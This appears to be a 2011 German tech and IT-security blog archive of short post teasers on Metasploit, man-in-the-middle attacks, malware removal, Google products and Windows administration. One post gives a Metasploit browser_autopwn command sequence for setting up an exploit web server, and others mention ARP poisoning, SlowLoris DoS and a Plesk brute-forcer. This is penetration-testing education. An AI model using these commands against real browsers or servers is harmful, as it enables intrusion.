Montag, 11. Juli 2011

Man-in-the-Middle-Angriff mit Cain und Abel unter Windows



In diesem VideoTutorial wird gezeigt, dass auch mit der Windows Software Cain und Abel ganz einfach ein sog. Man-in-the-Middle-Angriff bzw. sog. ARP-Poisoning durchgeführt werden kann.

Mein Tutorial findet ihr unter Cain und Abel - Men in the Middle Sniffer.




Samstag, 9. Juli 2011

Marketing mit Google Adwords / Google Analytics

Dieser Artikel richtet sich an alle Leute die mit Google Analytics und Google Adwords arbeiten. Ich habe gutes Video zu dem Thema bei GoogleBuisness gefunden. Es geht 59:56 Minuten und erklärt, wie man als "Kleinkind" als "Teenager" oder als "Erwachsener Ninja" mit den Werkzeugen umgeht die bereitgestellt werden. Es handelt sich um die Analyse von Micro und Marco Segment Analyse. Das Video fängt wirklich bei den Anfängen an und erklärt wie man den Nutzen durch Werbung analysieren kann.


Freitag, 8. Juli 2011

You Tube Experimente und neues Design testen

Hallo alle zusammen, ihr kennt ja bereits ein paar Experimente von Google z.B. der Websuche von Google, findet sich auch auf dieser Webseite. 
Über einen speziellen YouTube Kanal wird das neue Design aktiviert. 

Mittwoch, 6. Juli 2011

Nvidia Treiber Update Benutzer Updatus entfernen

Hallo zusammen, 
wer mag das schon nicht sichtbare Benutzeraccounts. In der normalen Windows Benutzerverwaltung taucht dieser Benutzer nicht auf. Dieser Benutzer wird installiert, wenn man bei der Treiber Installation den Update Service installiert. 

Dienstag, 5. Juli 2011

Wie das mobile Web benutzt wird

Hallo,
ich bin vor ein paar Tagen auf eine interessante Grafik gestoßen. Die zeigt wie und wo die mobile Benutzung stattfindet.

Ihr könnt euch die Grafik die sehr schön geworden ist auch auf getelastic.com ansehen. Datenquelle 

Programmierung - die TOP 25 Sicherheitslücken

Die Top25 der sicherheitsrelevanten Programmierfehler wurden veröffentlicht. Es finden sich auf den TOP Plätzen die 1. SQL-Injection, 2. OS-Command Injection. 3. Buffer Overflow. Die Informationswebseite von SANS ermöglicht es sich einen Überblick zu verschaffen und erklärt anhand von Beispielen, um welche Fehler es sich handelt. Wie hoch die Kosten für die Behebung sind. Wie oft diese Fehler von Angreifern ausgenutzt werden und was die Konsequenzen sind. 

Webentwicklung - FAQ aufbauen Prototype toggeln

Es gibt ab und an mal Momente wo ein Inhalt gekürzt dargestellt werden soll. Dort bietet es sich an einen sogenannten "toggle" einzusetzen. Also bleiben wir bei dem FAQ Beispiel wäre es wünschenswert, wenn man die Fragen einer Kategorie sieht und die entsprechenden Antworten einblenden kann. Als Beispiel nehme ich mal ein Magento Shop wo Prototype schon installiert und initialisiert ist.


Montag, 4. Juli 2011

Video: Defcon 18 - Was passiert wenn man einem Hacker seinem Computer stiehlt

Video: Defcon 18 - Was passiert wenn man einem Hacker seinem Computer stiehlt


Ein interessantes Video von der Defcon 18 - macht Spaß sich anzusehen :)


Gefahrenquelle Winlogon über USERINIT.EXE


Gefahrenquelle Winlogon über USERINIT.EXE

Diese Methode wird auch gerne von Schadsoftware eingesetzt, um sich auf einem Computer ungewollt zu installieren

XP - das unsichtbare Benutzerkonto SUPPORT_388945a0


Dieses Konto erfüllt eigentlich überhaupt keinen Zweck. Es wurde früher gemunkelt, dass dieses Benutzerkonto den "NSA-BUG" darstellen sollte. Diese Schnittstelle sollte Regierungen zugriff auf dem PC ermöglichen...  

Freitag, 1. Juli 2011

Programmierung CSS - Web Fonts / Schriftarten benutzen

Hallo liebe Webentwickler, heute möchte ich euch kurz einmal die Möglichkeit auf einer Webseite verschiedene Schriftarten zu verwenden. Die Schriftarten können bequem über CSS eingebunden werden und stehen kostenlos zur Verfügung. 

Donnerstag, 30. Juni 2011

HTML5 Browser Test WebApp

Heute möchte ich euch eine interessante Webseite vorstellen, welche eine Menge HTML5 Browser Tests durchführt. Wie kompatibel ist welcher Browser zum Nachfolger von HTML4. HTML5 bietet vielfältige neue Funktionalitäten wie unter anderem Video, Audio, lokalen Speicher und dynamische 2D- und 3D-Grafiken, die zuvor nicht originär unterstützt wurden, so dass zusätzliche Plugins wie Adobe Flash eingesetzt werden mussten

Microsoft warnt vor Bootkit Trojaner Win32/Popureb

Dieser Schädling benutzt wie TDSS4 ein Bootkit und versteckt sich im MBR der Festplatte. Es wird eine Neuinstallation vom System empfohlen aber in der Wiederherstellungkonsole kann bootrec.exe /fixmbr  aufgerufen werden und dann eine Systemwiederherstellung

Mittwoch, 29. Juni 2011

Projekt Google+ - soziales Netzwerk

Hallo zusammen, bis jetzt habe ich noch keine Einladung zu Google+ erhalten. Was etwas sonderbar ist, das man sich wirklich mehrmals anmelden kann, es kommt kein Hinweis, das man sich schon um eine Einladung beworben hat. Aber ich möchte auf dieser Seite doch auch die offiziellen Youtube Videos vorstellen. Es gibt eine kleine Demo von Google+ Projekt

Google startet Google+ das soziale Netzwerk

Heute hat Google sein lang erwartetes soziales Netzwerk Google+ gestartet. Auf der verlinkten Seite kann man sich für Google+ bewerben und brauch neben Namen nur seine Mail-Adresse anzugeben. Google+ besteht aus unterschiedlichen Funktionen, die sich im Grunde aber auf fünf Features die ein wirkliches soziales Netzwerk bilden. Derzeit benötigt man eine Einladung für die Teilnahme, man kann sich aber anmelden zum "Feldversuch".

Dienstag, 28. Juni 2011

Flash Konverter zu HTML5 - Google swiffy

Google hat heute ein neues Online Tool vorgestellt, sein Name ist swiffy, wohl eine Anlehnung an das Dateiformat von Flash *.SWF. Es kann auf einer Google Labs Webseite eine Flash Datei (SWF) hochgeladen werden. 

Google +1 Button nun in der Suche weltweit verfügbar

Google hat heute den Google +1 Button weltweit gestartet. Google +1 ist ein Teil der Google Suche. So können Nutzer ihren Kontakten eine Webseite direkt aus den Suchergebnissen empfehlen. Dieser Button ist aber nur für eingeloggte Nutzer verfügbar und noch nicht für alle Konten freigeschaltet. Wer ihn noch nicht hat kann ihn theoretisch unter der Google Experiment Seite aktivieren. 

Montag, 27. Juni 2011

.NET Framework Disassembler - Challange mit ILSpy

Und wie schon heute geschrieben, die kleine Reverse Engineering Aufgabe für euch. Ich habe eine VB .NET 2.0 Anwendung erstellt, welche eine kleine Loginbox bereitstellt. Bitte erst das Tool besorgen und das Tutorial  ILSpy .NET Framework Disassembler C# / VB lesen und den Disassembler von der Webseite herunterladen.



ILSpy .NET Framwork Disassembler C# / VB

Hallo heute möchte ich euch ein interessantes .NET Disassembler Tool vorstellen, welches aus EXE und DLL Dateien von .NET C# (CSharp) Quellcode generiert. In dem Beispiel auf dem Foto links sehen wir die MySQL.Connector für .NET. Es extrahiert die Kompletten Funktionsnamen des Programms oder der Bibliothek und zeigt dessen Quellcode an. Ein super .NET Disassembler der auch die Ursprungsform IL (Intermediate Language). Common Intermediate Language (CIL) (teilweise auch nur Intermediate Language (IL)) ist eine Zwischensprache, in die alle Programme der Common Language Infrastructure übersetzt werden. CIL ist eine objektorientierte Assemblersprache und ist vollständig stackbasiert. 

Sonntag, 26. Juni 2011

Metasploit Grundlagen Teil 3 - Meterpreter

Willkommen zum Teil 3 - Meterpreter einsetzten.
Beschäftigen wir uns einmal ein wenig mit den sogenannten payload, der Teil eines Pentests, welcher eine Aktion ausführt im normalen Fall wird ein Payload nur eine einzelne Aktion durchführen wie z.B. einen Benutzer dem System hinzufügen, Bind Shell bindet sich auf einen Port. Im Normalfall sind die payloads der exploits remote shells, also Konsolen auf die sich der Pentester oder IT-Security spezialist verbindet. Meistens werden dabei neue Prozesse erzeugt, welche einen Arlam bei einem Instrusion Detection System (IDS) auslöst. Größere Firmen, welche wichtige Daten besitzen sollten IDS Systeme einsetzten und auch gleich Honeypot-Systeme!


Metasploit Grundlagen Teil 1 - RPC DCOM Beispiel


Metasploit ist wohl das bekannteste Framework für Penetration Testing! Es eignet sich ebenfalls für die Entwicklung von Exploit Modulen, aber auch im IDS Signaturen zu erzeugen. Heute stellt es 705 Sicherheitslücken (vulnerability) zur Verfügung, welche ausgenutzt werden können (exploit). 224 payloads also das was der Exploit nach erfolgreichem Test ausführen soll z.B. eine Reverse Back Shell, neuen User anlegen etc.

Metasploit Grundlagen - Teil 2 - Verzeichnisstruktur verstehen

Hallo Willkommen zum nächsten Teil von Metasploit Grundlagen Teil 2 - Verzeichnis Struktur entdecken. 



Samstag, 25. Juni 2011

Offenes WLAN für Berlin! Freie Netze -- freie Stadt?

Was heißt freies W-LAN? Welchen Nutzen hat dies für die Stadt? Watum haben wir es noch nicht? Was unterscheidet das LINKE Modell eines offenen Netzes von denen der anderen Parteien? Was muss getan werden, damit wir Netz für alle bekommen? Diskussion mit Julia Witt, Jürgen Neumann und Tobias Schulze

Webentwicklung - Statistiken / Trends

Ich bin vor einiger Zeit auf eine Webseite gestoßen, die ein Paar "Trends" zeigt, was Web-Technologien angeht. 
Die Webseite HTTP-Archiv befindet sich noch in der BETA Phase und es können Vorschläge gemacht werden, welche Technologie Funktionen untersucht werden sollen. Eine Seite mit einigen grafischen Statistiken aus den Top Quellen wie Alexa, Fortune, etc. Es wurde vom Mitbegründer der WayBack Machine (alle Webseiten im Gigantischen Cache) gegründet!  

Freitag, 24. Juni 2011

Chrome Proxy Switchy - Proxys verwenden mit Regeln

Heute möchte ich euch eine sehr gute Erweiterung für Chrome vorstellen ,den Proxy Switchy. Dieser ermöglicht Proxy Profile anzulegen und diese Regel basierend  anzusteuern. Oder auch den Modus für einen beständigen Wechsel zwischen den Proxy Profilen, es ermöglicht ebenfalls die Möglichkeit unter Windows mit VPN Servern zu verbinden.

Donnerstag, 23. Juni 2011

Android: Google Goggles 1.5 - Informationen aus Kamera Bildern abrufen

Google hat das auf der I/O 2011 eine Erweiterung des Android Tools Goggles 1.5 angekündigt. Heute wurde es veröffentlicht. Goggles übersetzt Wörter in englisch, französisch, italienisch, deutsch, spanisch, portugiesisch und jetzt auch russisch. Dank einer guten OCR (Texterkennung auf Bildern) können zum Beispiel Speisekarten beim Urlaub im Ausland übersetzt werden. Die goggles APP gibts im übrigen auch für das iPhone kostenlos.

Mittwoch, 22. Juni 2011

Anonyme Proxy Liste mit praktischer Echtzeitprüfung

Einige von euch fragen sich bestimmt, wie man Anonym im Internet surfen kann. Diesbezüglich gibt es eine Möglichkeit die sogenannten Proxys, wobei allerdings unterschieden wird zwischen normalen Proxys und Anonymen Proxys (speichern keinerlei Logdateien).

Metasploit: Angriff mit Auxilary Browser Autopwn

Hallo zusammen, im Metasploit Framework gibt es eine Möglichkeit einen HTTP Server aufzusetzen, welcher gleich eine ganze Exploit Sammlung (20 Module) zum Angriff benutzt bis ein Angriff erfolgreich verläuft.

use auxiliary/server/browser_autopwn
set lhost 192.168.1.156
set srvport 80
set uripath browser-exploit-sammlung
exploit


Metasploit: Angriff auf den Virenscanner

heute möchte ich euch einmal die Macht von Metasploit zeigen.
Es demonstriert wie man einen Exploit Webserver gegen Firefox 3.5 aufsetzt und mit einer handvoll den üblicher Befehle den Exploit ausnutzt.


Dienstag, 21. Juni 2011

Gefahr durch Plesk Panel Brute Forcer 1.0

Hallo heute ist ein kleines billiges PHP Script aufgetaucht, welches mittels CURL mit der Zugang zum Plesk Panel 8.6 angegriffen werden kann.

Windows 2008 R2 - IIS7 PHP5 CGI installieren

Hallo heute habe ich mich mit dem Windows 2008 und dem Internet Information Server (IIS7) beschäftigt. Aufgabe war es auf dem System PHP5.2 zu installieren + mySQL 5.1. Dafür lädt man erstmal das entsprechende PHP 5.2 oder PHP 5.3 Paket herunter. Das heutige Problem ist die ISAPI DLL (php5isapi.dll) ist nicht mehr im Paket von PHP enthalten und müsste manuell Kompiliert werden, um sich diese ganzen Schritte zu sparen gibt es die Variante über PHP-CGI.exe PHP Scripte zu Parsen.

Defcon 17 - DoS gegen Apache mittels SlowLoris + SSLstrip

In diesem Video von der DefCon 17 über 2 Jahren wurde das erste mal SlowLoris gezeigt. SlowLoris ist eine Möglichkeit mit sehr wenig Bandbreite einen Denial of Service Angriff (DoS) durchzuführen. Ursprünglich wurde SlowLoris als Python Proof Concept vorgestellt. Inzwischen wird mit BOINC und SlowLoris unwesen getrieben, die Gruppe Anonymous verbreitet QSlowLoris (QT-Bibliothek) als *.exe, damit möglichst viele Hacktivisten teilnehmen können. Kein Python muss installiert werden.
Heute und gestern wurde zum Beispiel die GEMA angegriffen mit unter anderem SlowLowris.
Das Video demonstriert anfangs wie z.B. ein man in the middle Angriff (MITM-Angriff) durchgeführt wird in diesem Video gegen Facebook... ein gutes 36 Minuten Video einfach ansehen und genießen ;-)


Kaspersky Gründer im Interview über Kriegsschauplatz Internet

Der russische PC-Virenjäger und IT-Unternehmer Jewgenij Kasperski über die jüngsten Hacker-Angriffe auf Weltfirmen wie Google und Sony, virtuelle Killerprogramme wie Stuxnet sowie die ganz reale Entführung seines Sohnes.


Ein interessantes Interview aus Sicht eines Kryptologen über die erwähnten Themen!
Das komplette Interview auf Spiegel lesen....


"Das Netz wird Kriegsschauplatz"



Montag, 20. Juni 2011

Youtube Proxy - gesperrte Videos

Nun ein kurzer Quickie wer kennt es nicht, dieses Video ist in Ihrem Land nicht verfügbar, oder die entsprechenden Rechte fehlen. Der Proxy eignet sich auch dafür um Anonym auf Youtube zu surfen.

Youtube Proxy

BKA Trojaner ukash entfernen - Erfahrungsbericht

Heute ist mir ein besonders gewiefter Trojaner / Virus unter die Augen gekommen. Ein Laptop der mit dem "BKA Trojaner" infiziert war. Das Gemeine bei diesem Trojaner ist, das er sich über Sicherheitslücken im Browser während des Surfens im Internet installiert. Selbst bei aktivem Avira (aktuelle Signatur) konnte sich die Infektionsmethode durchsetzen. Wer den Rechner neustartet bekommt eine Meldung zu sehen in der man vom BKA aufgefordert wird 100 Euro über ukash zu bezahlen, um sich wieder freizuschalten! Auf keinen Fall die geforderten 100 Euro bezahlen! Es wird danach nicht funktionieren, oder nach einer Zeit das Problem wieder auftauchen!

Google Music - kostenloser Beta Test - erster Eindruck

Hallo alle zusammen vor einiger Zeit hat Google dazu aufgerufen, sich für die beta des Google Music Dienstes zu bewerben. Allerdings war eine Anmeldung nur in den USA möglich. Wie schön das es Proxys gibt. Ich habe seitdem Wochenende endlich den Zugang! Es wird die Anmeldung noch weiter vervollständigt, man wird gefragt ob man von Google Music bereitgestellte Musik haben möchte, dies kann man über die verschiedenen Genre (Jazz,Blues,Hip Hop, Rock, Alternativ, etc.) machen, diese Option scheint nur 1x aufrufbar zu sein. Als nächstes wird ein Programm runtergeladen mit dem die Musik von dem PC / Notebook zu Google Music übertragen wird.

Sonntag, 19. Juni 2011

BSI Lagebericht IT-Sicherheit 2011 in Deutschland


Der BSI-Lagebericht "Die Lage der IT-Sicherheit in Deutschland 2011" macht deutlich, dass die aktuellen Gefährdungen wie Cyberangriffe, Angriffe auf mobile Endgeräte und Attacken, die auch außerhalb der klassischen IT greifen, eine Herausforderung für Politik, Wirtschaft und Gesellschaft bedeuten.
Trendthemen wie Cloud Computing und Smart Meter werden Anbieter, Nutzer und auch das BSI im Hinblick auf Risikomanagement und die Gewährleistung von Informationssicherheit künftig stark beschäftigen.


Donnerstag, 16. Juni 2011

.NET / C++ AMP (Accelerated Massive Parallelism) Threading Framework angekündigt

Mehrere Prozessorkerne effektiv nutzen plus die Leistung der Grafikkarte GPU.
Der Konzern beabsichtigt, die Bibliothek als offene Spezifikation zur Verfügung zu stellen, und wird sie dem Spezifikationsorganisation ANSI zur Standardisierung in C++ vorschlagen. Microsofts Entwicklungsumgebung für C++-Entwickler Visual C++ soll AMP ab der nächsten Version unterstützen, kündigte Sutter an. Und für C# und .NET sind ebenfalls AMP-Erweiterungen vorgesehen.



Microsoft bohrt C++ für Parallelprogrammierung auf



Mittwoch, 15. Juni 2011

Webanwendungen - Passwörter "unknackbar" speichern

Natürlich kommt es auf die Länge an. Aber mit der richtigen Technik speichern Administratoren auch weniger sichere Passwörter so, dass sich ein Angreifer selbst mit modernster Knack-Ausrüstung daran die Zähne ausbeißt.



Adobe PDF Reader / Schockwave / Flash - 38 Sicherheitslücken


Ein Angreifer könnte laut einer Sicherheitsmeldung einen Absturz der Anwendungen auslösen und die Kontrolle über betroffene Systeme übernehmen. Adobe Security Bulletins. Derzeit sind die gemeldeten Sicherheitslücken noch ohne verfügbaren 0day Exploit!

TrueCrypt - verschlüsselte virtuelle Laufwerke für jeden

Es gibt manchmal Situationen in denen man sensible Daten / Verzeichnisse gezielt absichern möchte! Truecrypt kann bei diesem Problem helfen! Als einfachtes Beispiel erzeugen wir einen Dateicontainer, welcher entweder mit AES, Twofish, Serpent verschlüsseln lässt. Diese generierte Datei kann durch Truecrypt als ein Laufwerk gemountet werden, also wird im Explorer zum Beispiel als Laufwerk Z:\ angezeigt. Das geniale an Truecrypt es gibt es für Windows 7 / Vista / XP, Mac OS X, Linux und kostet keinen Cent. Ich finde diese Variante besser als z.B. durch Windows Boardmittel die Sicherheitseinstellungen für den Ordner zu verändern, so das z.B. nur bestimmte Personen zugreifen können.



Virtuelle Laufwerke mit subst anlegen

Heute geht es um das anlegen von virtuellen Laufwerken. In den neueren Windows Versionen wie Windows 7 ist es möglich sogenannte "Bibliotheken" aus Verzeichnissen zu erzeugen, diese sind allerdings nichts anderes als eine  Favoritenliste im Explorer Dateibrowser. Ich möchte euch heute eine Möglichkeit zeigen mit der sich echte virtuelle Laufwerke anlegen lassen! Man mag es nicht glauben aber Windows besitzt dafür ein eigenes Boardmittel namens Subst.

Dienstag, 14. Juni 2011

Google Suche mittels Bild als Quelle

Hallo zusammen, heute hat Google bei der Inside Search 2011 Veranstalltung eine neuartige Möglichkeit vorgestellt Informationen für Bild zu erhalten. Erkennbar ob die neue Bildersuche aktiv ist, durch ein kleines Symbol in der Bildersuche.

Google Instant Pages - geniale Erweiterung der Suche

Hallo, heute hat Google ein neues Feature für Google Chrome vorgestellt. Google Instant Pages ist wirklich die größte Neuerung bei dem heutigen Webcast Google Inside Search 2011. Auf der Webseite von Google Inside Search findet man auch unter "Features -> Advanced Tricks" wo z.B. "~" erklärt wird.

PoC - LNK Exploit DoS Explorer.exe

Hallo zusammen, in den weiten des Internet ist ein Beitrag aufgetaucht der nochmal die Gefahr von Stuxnet erklärt. Bei diesem *.LNK Bug war es möglich einen Rechner zu infizieren durch das bloße Betrachten eines Verzeichnisses. *.LNK Verknüpfungen werden von der SHELL32.dll Bibliothek geparst. Einen genauen Aufbau der Struktur kann man der MSDN entnehmen unter Structure Example -> Shortcut to a File.

Youtube Online Videothek

In den USA gibt es schon die Youtube Videothek in der man auch kostenlos Filme herunterladen kann.
Ich bin heute mal durch Zufall auf die Seite gelangt und zum erstaunen gibt es dort einige englische Titel die man in der deutschen Übersetzung von Youtube zu sehen bekommt.

Google 6 Thesen über die Zukunft der Online Werbung im Jahr 2015

  • Die Anzahl der Impressionen von Display Ads wird sich um 25% pro Person verringern. 
  • Engagement rates werden über alle Anzeigen um 50 % gesteigert. 
  • Die Menschen haben direkten Einfluss auf 25% der Werbung, die sie sehen
  • 35 % der Kampagnen werden in erster Linie Daten jenseits von Klicks und Conversions nutzen
  • 25 Milliarden Anzeigen am Tag werden den Menschen erzählen warum sie diese sehen
  • Über 40 Prozent der Amerikaner mit Internetzugang werden die Display Ads als ihre Lieblingsform der Werbung bezeichnen

Google watch this Space Informationen für werbetreibende

Google hat vor einigen Monaten ein Paar Videos gestartet.
Zu den Fakten in Youtube wird innerhalb von 60 Tagen  mehr Inhalt hochgeladen als in den drei größten Fernsehsendern in Deutschland.
Die Zukunft der Werbung?

Montag, 13. Juni 2011

AdBlock - Werbung aus dem Internet blocken / Firefox / Chrome

Diese Extension gibt es für den Mozilla Firefox als Adblock Plus und für den Google Chrome Browser.
Viele von euch werden diese Möglichkeit bestimmt schon kennen, aber für Neulinge empfehle ich diese Erweiterung, da Werbung keine Bandbreite mehr verschwendet und somit die Seiten ohne die entsprechenden Werbetexte und Bilder schneller angezeigt werden.
Desweiteren sinkt das Risiko sich durch von Angreifern geschaltete Werbe Banner zu infizieren!

7 Online Antivirus Programme

Hallo heute möchte ich euch kurz eine Möglichkeit vorstellen mit der Ihr verdächtige Dateien überprüfen könnt bevor ihr diese öffnet. Diese Scanner ersetzten keine komplette Antiviruslösung wie Antivir, Avast, etc. Es ermöglicht lediglich eine Datei hochzuladen, um diese Analysieren zu lassen. Besonders interessant ist hier Virus Total und z.B. Jotti, welche gleich in mehreren IT-Security Lösungen sucht, ob es die Datei als Virus / Malware identifizieren kann.


Software as a Service (SaaS) vs. Security as a Service

Software as a Service, kurz SaaS ist ein Teilbereich des Cloud Computings. Das SaaS-Modell basiert auf dem Grundsatz, dass die Software und die IT-Infrastruktur bei einem externen IT-Dienstleister betrieben und vom Kunden als Service genutzt werden. Für die Nutzung wird ausschließlich ein internetfähiger PC sowie die Internetanbindung an den externen IT-Dienstleister benötigt. 



Command Line - systeminfo.exe - Systeminformationen auslesen

Hallo ich möchte euch wieder ein kleines praktisches Tool vorstellen mit dem Systeminformationen gesammelt werden können. Dies kann z.B. dafür eingesetzt werden um zu überprüfen ob auch wirklich alle Windows Hotfixes / Windows Updates installiert wurden. Es wird die Gesamtanzahl der Installierten Patches ermittelt, ja sogar welche installiert wurden finden sich dort. Aber auch Informationen über den Computer, Netzwerkadapter. Es soll auch möglich sein die Informationen Remote zu ermitteln. systeminfo /s 192.168.1.35 /u Domain\admin  /p Passwort. Bei meinen Tests lies sich keine Verbindung mit meiner VM-Ware Maschine herstellen. Dies könnte für Systemadministratoren interessant sein!

Geöffnete Netzwerkfreigaben im Blick mit cmd "OpenFiles"

Wer z.B. mal ein Programm Programmieren möchte, welches aktive Verbindungen aus der Netzwerkumgebung ausgibt, dem empfehle ich dieses Tool, was so wirkt wie ein Bestandteil vom Commandline Tool  "net session" / "net use" nur mit ein paar mehr Informationen. Eine Kombination aus allem wäre wohl die erste Wahl. NET SESSION ermittelt z.B.


Arbeiten mit SFC - Windows Dateischutz prüfen

Hallo zusammen, wer einmal erlebt hat wie nach einem Systemcrash das System nicht mehr "normal" funktioniert und irgendwie ausgelastet scheint, den kann ich beruhigen! Bei Stromverlust oder auch Bluescreen kann es im folgenden Systemstart dazu führen, dass Windows sein Dateischutz / Systemdateien überprüft (Windows File Protection, WFP).  Führt man dann in der cmd als Administrator gestartet sfc /scannow aus erscheint eine Meldung, das Windows gerade eine Prüfung vornimmt und man es später nochmal durchführen soll. System File Checker (sfc) wurde z.B. vom Wurm Code Red erfolgreich gepatcht und eine Veränderung an der winsock32 nicht bemerkt. Diese Prüfung stellt sicher das Original Microsoft Windows Systemdateien verwendet werden.


Windows Vista / 7 - die Sprachpakete nachinstallieren

Schon mal einen Laptop billig gekauft allerdings mit dem falschen Sprachpaket?
Im Normalfall wird in der Systemsteuerung -> Sprache und Region  (Systemsteuerung\Alle Systemsteuerungselemente) -> Tab: "Tastaturen und Sprache" -> Button: Sprachen installieren/deinstallieren.

Soweit ich weiß gibt es die Sprachpakete über Windows Update nur wenn man mindestens Enterprise / Ultimate Edition hat.

Sonntag, 12. Juni 2011

Anti Spoofing/Poisoning Tool - ArpON 2.6


Heute bin ich auf ein sehr interessantes Programm aufmerksam geworden. Es heißt ArpON und wird auf sourceforge aktiv weiterentwickelt und verhindert das ARP Spoofing. Also einer Methode bei der z.B. der Datenverkehr zwischen switch, hub gestörrt wird. Diese Methode wird verwendet um Men in the middle Angriffe durchführen zu können. Das Gefährliche bei einer Men in the middle Angriff ist, das sämtliche Daten über den Angreifer geleitet werden.  Aber auch andere Angriffe wie DNS Spoofing, DHCP Spoofing werden erkannt und geblockt. 





Samstag, 11. Juni 2011

Belgien : NATO im Cyber-Krieg

Cyber-Krieg und Cyber-Terrorismus - diesen Themen widmen zahlreiche Staaten mehr und mehr Aufmerksamkeit. Bereits während der Münchner Sicherheitskonferenz Anfang Februar debattierten die Teilnehmer darüber, und die Bundesregierung beschloss nun, ein nationales Cyber-Abwehrzentrum einzurichten.


Freitag, 10. Juni 2011

Sichere Passwörter mit KeePass erstellen und verwalten

Wie ich finde ist KeePass ein sehr gutes Programm, um seine Passwörter nicht nur zu verwalten sondern auch um sie generieren zu lassen. Keepass kommt mit einer Baumsicht daher und lässt sich so wunderbar aufteilen in Bereiche wie "Privat", "Arbeit" und darunter vielleicht z.B. die einzelnen Kunden darunter könnte man "Email-Accounts", "Server", "Development" einrichten.


Arte Doku: Die Welt der Cyberpiraten - Debatte inkl. keine Vorratsdatenspeicherung


Die Gäste:
Éric Filiol, Experti in Informatiksicherheit
Sandro Gaycken, Technik- und Sicherheitsforscher an der Freien Universität Berlin
(Frankreich, 2011, 30mn)
ARTE F


Admin Wissen: Apache Webserver hängt startet nicht mehr

Hallo, ich möchte euch heute ein kleines Problem vorstellen was einen Server Neuling schon zur Verzweifelung bringen kann und zwar. Folgende Fehlermeldung vom Apache bei /etc/ini.d/apache restart


"Restarting / Starting web server: apache2(98)Address already in use: make_sock: could not bind to address 0.0.0.0:80
no listening sockets available, shutting down
Unable to open logs
 failed!"


Donnerstag, 9. Juni 2011

Microsoft Tool zum beheben von Windows Update Fehlern

Systemupdate-Vorbereitungstool für Windows Vista, Windows Server 2008, Windows 7 und Windows Server 2008 R2. Ich bin durch Zufall aus Tool geschossen und fand es irgendwie interessant :-)


Arte Doku: Die Welt der Cyberpiraten

Die Welt der Cyberpir@ten

Die digitalisierte Gesellschaft bietet modernen Hackern eine riesige, vielleicht sogar unbegrenzte Angriffsfläche. Unbemerkt dringen sie in Systeme ein, um diese unter ihre Kontrolle zu bringen, Daten zu verändern oder zu entfernen, Webseiten nach Belieben zu sperren oder großräumig Informationen zu verbreiten. Die Liga der Netzwerkprofis wird zur neuen Macht des Untergrunds und gilt für manche bereits als "fünfte Staatsmacht". Bedrohlich wird diese Macht, wenn sich Hacker Zugriff auf die digitalen Lebensadern unserer Gesellschaft verschaffen.

BlueScreen Viewer - Systemabsturz Analyse

Nirsoft hat ein interessantes Freeware Tool entwickelt den BlueScreen Viewer. Mit der Software lässt sich der letzte Windows Systemabsturtz nachvollziehen. Es werden einem die letzten Systemabstürze von Windows angezeigt. Die Informationen holt das Programm aus dem C:\Windows\Minidump\ Ordner wo Windows per Standard die Minidumps speichert.

Eine integrierte Google Suchfunktion ist indem BlueScreen Viewer / Analyser vorhanden.

Rechte Maustaste in der oberen Auflistung "Google Search - Bug Check + Drivers". Es finden sich schon interessante informationen zu dem Fehler. Eine Schnellanalyse geht über die Eigenschaften, welche ebenfalls im Kontextmenü vorhanden ist.

Falls die Abstürze nicht aufgezeichnet werden, einfach in der Windows Registry den Dword Wert unter
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl] "CrashDumpEnabled"=dword:00000003 anlegen.

Hier noch ein  kleiner Guide wie den Crashdump (eng) es unter Windows aktiviert.

Mittwoch, 8. Juni 2011

Video: Vom Digitalangriff zum Cyberkrieg?


Nach Boden, Wasser und Luft erobert der Krieg nun einen neuen Raum, den Cyberspace. Der Cyberkrieg begann fast unbemerkt, unterscheidet nicht wie herkömmliche Konflikte zwischen Militär und Zivilbevölkerung und wird das 21. Jahrhundert in einem Maße prägen, das für frühere Zeiten mit der Atombombe oder dem Kalten Krieg vergleichbar ist.
Die neuen Waffen heißen Virus, Cyberspionage, Wurmangriff und Social Engineering. Und im digitalen Wettrüsten will kein Staat hinten anstehen. Anschaulich berichtet die Dokumentation über einen Paradigmenwechsel in der Kriegsführung, die jetzt im Verborgenen stattfindet: Sabotage eines iranischen Nuklearprogramms durch den israelischen Computerwurm Stuxnet, Botnetze als Waffe im Cyberkrieg zwischen Russland und Georgien, der Kalte Cyberkrieg zwischen den USA und China mit digitalen Attacken und Gegenschlägen. Die modernen Gesellschaften sind mittlerweile so abhängig vom Internet, das nicht nur der Kommunikation, sondern auch der Verwaltung von Wasser- und Stromversorgung und Transportwegen dient, dass eine Cyberattacke ganz Frankreich, Deutschland, Japan oder Amerika lahmlegen könnte.
Richard Clarke, Anti-Terror-Experte unter Bill Clinton und George W. Bush, erkannte als einer der Ersten die Gefahr des Cyberkriegs. Mit seiner Hilfe gibt die Dokumentation mögliche Antworten auf die Fragen: Wie reagiert man auf eine Cyberattacke? Wie demaskiert man einen hinter digitaler Anonymität verborgenen Feind? Ist der digitale Gegenangriff die beste Verteidigung im Cyberkrieg? Und vor allem: Wie weit kann man gehen?

Arbeiten mit Shortcuts CPL Dateien

Einfach unter Windows WIN + R und dann die entsprechenden Namen einstragen. Ein paar sinnvolle gibt es hier
Appwiz.cpl Softwareeigenschaften
Hdwwiz.cpl  - Hardwareeigenschaften
Firewall.cpl - Firewalleigenschaften
Desk.cpl - Desktop Einstellungen
Ncpa.cpl - Netzwerkverbindungseigenschaften
Powercfg.cpl - Energieoptioneneigenschaften
Sysdm.cpl - Systemeigenschaften
Main.cpl  - Mauseigenschaften, etwas komischer name ;-)
Mmsys.cpl - Eigenschaften von Multimedia
collab.cpl - Benutzereinstellungen


Auflistung aus der MSDN Liste - irgendwie nicht vollständig!


Es gibt noch mehr *.CPL Dateien. Einfach unter C:\Windows\system32\ nach *.CPL suchen! 
Auch einige andere  Programme die Symbole / Verknüpfungen angelegt haben benutzen die *.CPL Dateien.


Wie man Systemsteuerungsbereiche (*.CPL) ausblendet
WIN + R -> regedit 


HKEY_CURRENT_USER\Control Panel\don't load


dort einfach eine Zeichenfolge anlegen mit dem namen der CPL Datei anlegen.

Dienstag, 7. Juni 2011

Admin Wissen - Pagefile.sys enthält Passwörter und Hashes

Hallo :-)
